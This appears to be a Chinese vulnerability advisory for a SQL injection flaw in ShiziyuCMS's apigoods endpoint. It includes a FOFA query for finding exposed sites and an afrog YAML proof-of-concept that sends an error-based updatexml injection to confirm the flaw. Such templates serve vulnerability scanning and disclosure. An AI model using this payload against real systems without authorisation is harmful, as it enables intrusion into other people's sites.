shiziyu-cms-apigood-controller-sql-injection: 狮子鱼CMS ApigoodController.class.php SQL注入漏洞

日期: 2025-09-01 | 影响软件: 狮子鱼CMS Apigood Controller | POC: 已公开

漏洞描述

狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 fofa-query: "/seller.php?s=/Public/login"

PoC代码[已公开]

id: shiziyu-cms-apigood-controller-sql-injection

info:
  name: 狮子鱼CMS ApigoodController.class.php SQL注入漏洞
  author: daffainfo
  severity: critical
  description: |
    狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞
    fofa-query: "/seller.php?s=/Public/login"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20ApigoodController.class.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    
set:
  rand: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)
    expression:  response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/shiziyu-cms-apigood-controller-sql-injection.yaml